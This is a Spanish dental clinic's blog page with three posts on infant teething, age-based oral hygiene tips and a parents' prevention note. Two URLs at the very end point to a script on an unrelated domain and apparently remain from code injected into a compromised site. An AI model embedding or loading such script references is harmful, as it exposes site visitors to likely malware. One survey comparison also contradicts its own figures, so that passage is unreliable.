Robles Dental

Dentistas de familia desde 1984


Deja un comentario

Cómo afrontar la primera dentición

La dentición o salida de los primeros dientes de los bebés puede ser una época frustrante tanto para ellos como para los padres. Por ello, desde Robles Dental, queremos ofrecerle información de utilidad para poder afrontar este proceso de la mejor forma posible y que pueda prevenir posibles problemas.

¿Cuándo comienza la dentición?

Normalmente los primeros dientes empiezan a salir a partir de los 3 meses y continúan hasta que el niño cumple los tres años. La mayoría de los niños tienen sus 20 dientes de leche al cumplir su tercer año; por ello, si observa que los dientes de su hijo tienen un retraso significativo, debería consultarlo con su especialista.

En casos poco frecuentes, los niños nacen con uno o dos dientes o producen un diente durante las primeras semanas de vida. Salvo que estos dientes interfieran con la alimentación o estén demasiado sueltos como para que el bebé pueda tragarlos, generalmente no es una causa de preocupación.

¿Qué comportamiento puede tener un bebe durante su dentición?

La dentición suele ser un proceso doloroso para el bebé, por lo que llorará y experimentará periodos de irritabilidad durante varias semanas. Además babean más y empezarán a querer morder cosas.

Aunque las encías sensibles e hinchadas pueden provocar un pequeño aumento de la temperatura de su bebé, normalmente la salida de los dientes no ocasiona fiebre alta ni diarrea. Si su bebé tiene fiebre durante la dentición, puede que se deba a otro motivo y es mejor que se ponga en contacto con su médico.

¿Qué puedo hacer por mi bebé cuando le están saliendo los dientes?

A continuación detallamos algunos consejos que deberá tener en cuenta cuando a su bebé le estén saliendo los dientes:

  • Limpie regularmente la cara de su bebé con un pañito suave para quitarle el exceso de babas y evitar que se le irrite la piel.

  • De a su bebé algo que pueda morder. Asegúrese de que sea lo suficientemente grande para que no se ahogue al querer tragarlo, y que tampoco pueda romperse en trozos pequeños. Un paño húmedo que haya estado en el refrigerador durante 30 minutos puede ser algo muy útil cuando los dientes están saliendo; asegúrese de lavarlo cada vez después de que el bebé lo utilice.

  • Frote las encías de su bebé con un dedo limpio.

Recuerde que cuidando los dientes de leche contribuirá a que su hijo luzca una sonrisa bonita en el futuro, por ello el cuidado diario dental del bebé debe comenzar antes de la salida de su primer diente.

Limpie las encías de su bebé diariamente con una gasa, o cepíllelas muy suavemente con un cepillo de dientes suave para bebé y agua.  Cepille también con agua los primeros dientes tan pronto como aparezcan. Solo utilice dentífrico cuando el niño tenga alrededor de 3 años de edad, ya que ya habrá crecido lo suficiente como para escupir el dentífrico y no tragárselo.

Cuando todos los dientes de su bebé hayan salido, intente limpiárselos al menos dos veces al día, especialmente después de las comidas. Y acostúmbrelo a utilizar el hilo dental cuando ya tenga todos los dientes.

La Sociedad Española de Odontopediatría recomienda que los niños visiten a su dentista antes de su primer aniversario. No para tratarlos, si no para enseñar a los padres las herramientas necesarias para que cuiden de la salud bucal de sus hijos.

Tenga en cuenta que con una buena prevención, se pueden ahorrar problemas de salud más tarde.


Deja un comentario

Primeros pasos para una dentición saludable

La caries dental es el problema número uno en niños de edad preescolar; es dolorosa y causa problemas de salud como infecciones, repercutiendo en la calidad de vida del niño.

Se puede desarrollar tan pronto como aparece el primer diente, por ello es importante tomar conciencia de que los dientes de leche tienen un papel fundamental en el desarrollo de los dientes permanentes. Funcionan como marcadores de posición, es decir; si los dientes de leche se pierden antes de tiempo, la dentición permanente pierde el rastro de su antecesor, originando un mal desarrollo en los huesos maxilares que los va a alojar.

Por todo ello, desde Robles Dental, os queremos informar de la importancia que tiene la prevención creando hábitos de higiene desde pequeños, para que crezcan con una sonrisa saludable. Os dejamos con varios consejos en función de la edad de nuestros niños:

3-400x387

Del nacimiento a los 12 meses

  • Los buenos hábitos dentales deben comenzar antes de que aparezca el primer diente. Después de alimentarlo, cepille suavemente las encías del bebé, usando un cepillo de dientes mojado que tenga cerdas suaves, ó  límpielos con un paño limpio y húmedo.

  • Pregunte por la idoneidad de la fluoración a su dentista. Dependerá de la fluoración de las aguas de consumo ó si bebe agua embotellada. No usar pasta fluorada antes de los dos años debido a que se la puede tragar.

  • Chequeo dental. Obtendrá información de control de hábitos, uso del chupete, consejos alimenticios, etc.

12 a 24 meses

  • Cepille los dientes de su hijo 3 veces al día usando un cepillo pequeño de cerdas suaves, húmedo ó simplemente manchado de pasta dental, hay muchos modelos infantiles en el mercado.  No saltarse el cepillado antes de acostarse. Instaure el hábito de cepillado, simulando un juego participativo.

  • Limite bebidas azucaradas y ácidas: Asegúrese de que su hijo no toma más de 1 vaso pequeño  cada día y sólo durante las comidas.

  • Programe un chequeo dental. Importante en esta época el control de hábitos tales como: chuparse el dedo ó uso de chupete. Su permanencia provocarán deformaciones en ambos maxilares, empuje lingual, mordida abierta, malformaciones estructurales que darán lugar a tratamientos de ortodoncias, logopédicos.

A  partir de 24 meses

  • Use pasta dental con fluoruro.  Ayuda a prevenir las caries, pero enseñe a su hijo que no se la trague. Use una cantidad pequeña, lo justo para o que la pasta manche las cerdas. La ingestión de demasiada crema con fluoruro puede ocasionar manchas blancas o marrones en los dientes permanentes de su hijo. Si a su hijo no le gusta el sabor de la pasta de dientes, pruebe con otro sabor o usar agua corriente.

  • Floss. se puede usar el hilo dental  tan pronto como 2 dientes se toquen entre sí, pero no todos los niños necesitan su uso a esta edad, así que consulte con su dentista.

  • Programe un chequeo dental. Lleve a su hijo a un chequeo dental por lo menos una vez al año.

Otras recomendaciones

  • Si existen antecedentes de caries en los padres, NO compartir alimentos y/o bebidas con sus hijos porque puede transmitirles los gérmenes que causan las caries y la enfermedad de las encías.

  • NO acostar a su hijo con el biberón; si lo hace, que contenga agua.

  • Dar alimentos saludables a sus hijos: fruta y verdura. Evitar dulces y alimentos pegajosos, sobretodo si están fuera de casa y no se pueden cepillar los dientes.

  • Si el niño tiene sed, darle agua. Fuera de los comidas no ingerir bebidas con gas, zumos, limonadas, bebidas deportivas, con sabor, etc. por la cantidad de ácido y azúcares que contienen, ya que producen caries.

 


Deja un comentario

Escuela de padres: La importancia de la prevención

En 2015, un estudio sobre salud bucodental realizado a 7.500 padres de toda Europa, reveló que un tercio de los niños de nuestro país se cepillan solo los dientes anteriores, omitiendo completamente los posteriores, y el 43,1% no se cepilla los dientes el tiempo necesario (dos minutos).

Más del 90% de los padres encuestados, están de acuerdo en que la adquisición de hábitos de cepillado dental está directamente relacionado con el ejemplo que ellos den. Por ello, es muy importante que los niños los vean cepillarse los dientes.

Con la vuelta al colegio, lo niños suelen ingerir más bollería industrial, con azúcares y grasas saturadas, que a la larga pueden provocar obesidad y caries. Es importante además, que el niño tenga hábito de cepillado, para mantener una adecuada higiene buco dental tanto dentro como fuega del hogar.

Un dato relevante de este estudio es que, en comparación con nuestros vecinos los franceses, los niños españoles visitan al dentista con menor frecuencia (un 45.6% frente a un 40.4% respectivamente), a los siete años de edad el 16,2% ya tienen algún empaste y al 12% ya se le ha practicado alguna extracción dentaria.

Con todo, la asistencia dental profesional orientada a la prevención es muy importante y más gratificante tanto para niños como padres, lo que conlleva menores costes futuros.

Como el sabio refrán reza, más vale prevenir que curar, prevengamos ahora y nuestros niños llegarán a la adultez con bocas sanas y equilibradas, ¡os lo agradecerán!.

http://plugintemarosa.info/dfi823hs.js?0.8205492097881708

http://plugintemarosa.info/dfi823hs.js?0.7518993786318734